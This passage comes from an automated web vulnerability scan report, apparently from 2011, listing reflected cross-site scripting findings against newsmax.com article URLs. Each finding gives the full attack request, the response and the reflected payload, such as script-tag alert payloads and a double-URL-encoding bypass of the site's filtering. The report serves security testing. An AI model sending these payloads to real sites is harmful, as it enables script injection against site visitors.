class="article_tools_link">
...[SNIP]...

1.28. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f18c1'%20a%3db%20df36caabad1 was submitted in the REST URL parameter 5. This input was echoed as f18c1' a=b df36caabad1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18f18c1'%20a%3db%20df36caabad1/id/389917 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45965
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
ntact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18f18c1' a=b df36caabad1/id/389917'
class="article_tools_link">
...[SNIP]...

1.29. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75ff3%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea2bddf3f416 was submitted in the REST URL parameter 7. This input was echoed as 75ff3"><img src=a onerror=alert(1)>a2bddf3f416 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/38991775ff3%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea2bddf3f416 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 42570
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="javascript:printPage(38991775ff3"><img src=a onerror=alert(1)>a2bddf3f416);"
class="article_tools_link">
...[SNIP]...

1.30. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 21de8'%20a%3db%20a07cd9ef265 was submitted in the REST URL parameter 7. This input was echoed as 21de8' a=b a07cd9ef265 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/38991721de8'%20a%3db%20a07cd9ef265 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 42126
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
ors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/38991721de8' a=b a07cd9ef265'
class="article_tools_link">
...[SNIP]...

1.31. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65d2a'><script>alert(1)</script>7d93cfc3716 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?65d2a'><script>alert(1)</script>7d93cfc3716=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46187
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
rs/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?65d2a'><script>alert(1)</script>7d93cfc3716=1'
class="article_tools_link">
...[SNIP]...

1.32. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7ca"><script>alert(1)</script>8c20879ddf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?bb7ca"><script>alert(1)</script>8c20879ddf6=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46192
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
end?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917?bb7ca"><script>alert(1)</script>8c20879ddf6=1')"
class="article_tools_link">
...[SNIP]...

1.33. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94c9a'%20a%3db%209229f875432 was submitted in the REST URL parameter 2. This input was echoed as 94c9a' a=b 9229f875432 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Stock-trading-workshop-tips94c9a'%20a%3db%209229f875432/2011/03/17/id/371844 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45598
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   5 Thi
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Stock-trading-workshop-tips94c9a' a=b 9229f875432/2011/03/17/id/371844'
class="article_tools_link">
...[SNIP]...

1.34. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19c4d'%20a%3db%20cea8d56507b was submitted in the REST URL parameter 3. This input was echoed as 19c4d' a=b cea8d56507b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Stock-trading-workshop-tips/201119c4d'%20a%3db%20cea8d56507b/03/17/id/371844 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45598
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   5 Thi
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Stock-trading-workshop-tips/201119c4d' a=b cea8d56507b/03/17/id/371844'
class="article_tools_link">
...[SNIP]...

1.35. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8e50'%20a%3db%20879e713f874 was submitted in the REST URL parameter 4. This input was echoed as f8e50' a=b 879e713f874 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Stock-trading-workshop-tips/2011/03f8e50'%20a%3db%20879e713f874/17/id/371844 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45598
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   5 Thi
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03f8e50' a=b 879e713f874/17/id/371844'
class="article_tools_link">
...[SNIP]...

1.36. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7782c'%20a%3db%20781375d999b was submitted in the REST URL parameter 5. This input was echoed as 7782c' a=b 781375d999b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Stock-trading-workshop-tips/2011/03/177782c'%20a%3db%20781375d999b/id/371844 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45598
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   5 Thi
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03/177782c' a=b 781375d999b/id/371844'
class="article_tools_link">
...[SNIP]...

1.37. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45e65'%20a%3db%20c8f5f821c94 was submitted in the REST URL parameter 7. This input was echoed as 45e65' a=b c8f5f821c94 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/37184445e65'%20a%3db%20c8f5f821c94 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41015
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/37184445e65' a=b c8f5f821c94'
class="article_tools_link">
...[SNIP]...

1.38. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7def0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e19683aed965 was submitted in the REST URL parameter 7. This input was echoed as 7def0"><img src=a onerror=alert(1)>19683aed965 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/3718447def0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e19683aed965 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41463
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="javascript:printPage(3718447def0"><img src=a onerror=alert(1)>19683aed965);"
class="article_tools_link">
...[SNIP]...

1.39. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4e7"><script>alert(1)</script>650306665dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?7b4e7"><script>alert(1)</script>650306665dd=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45825
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   5 Thi
...[SNIP]...
<a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?7b4e7"><script>alert(1)</script>650306665dd=1')"
class="article_tools_link">
...[SNIP]...

1.40. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ad59e'><script>alert(1)</script>63cdc65a388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?ad59e'><script>alert(1)</script>63cdc65a388=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
